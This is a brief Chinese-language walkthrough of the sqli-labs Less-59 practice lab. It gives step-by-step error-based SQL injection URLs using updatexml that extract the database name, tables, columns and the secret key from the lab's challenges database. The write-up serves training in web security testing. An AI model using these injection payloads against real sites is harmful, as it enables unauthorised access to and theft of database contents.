Sqli-labs-Less-58(笔记)

Sqli-labs-Less-59(笔记)
本关对输入次数的限制为5次,不做过多解释,直接使用报错注入
判断注入点
http://www.web.com/sql/Less-59/?id=1’
报错,显示我们多了一个’因此此处不需要包裹
Sqli-labs-Less-59(笔记)
查看当前库
http://www.web.com/sql/Less-59/?id=1 and updatexml(1,concat(0x7e,(select database()),0x7e),1)–+
Sqli-labs-Less-59(笔记)
查看表
http://www.web.com/sql/Less-59/?id=1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=‘challenges’),0x7e),1)–+
Sqli-labs-Less-59(笔记)

查看字段
http://www.web.com/sql/Less-59/?id=1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=‘kl0wum0ijj’),0x7e),1)–+
Sqli-labs-Less-59(笔记)

查看密码
http://www.web.com/sql/Less-59/?id=1 and updatexml(1,concat(0x7e,(select group_concat(secret_BORM) from challenges.kl0wum0ijj),0x7e),1)–+
Sqli-labs-Less-59(笔记)
将得到的密码输入到下面的方框中进行验证
Sqli-labs-Less-59(笔记)
成功
Sqli-labs-Less-59(笔记)

相关文章: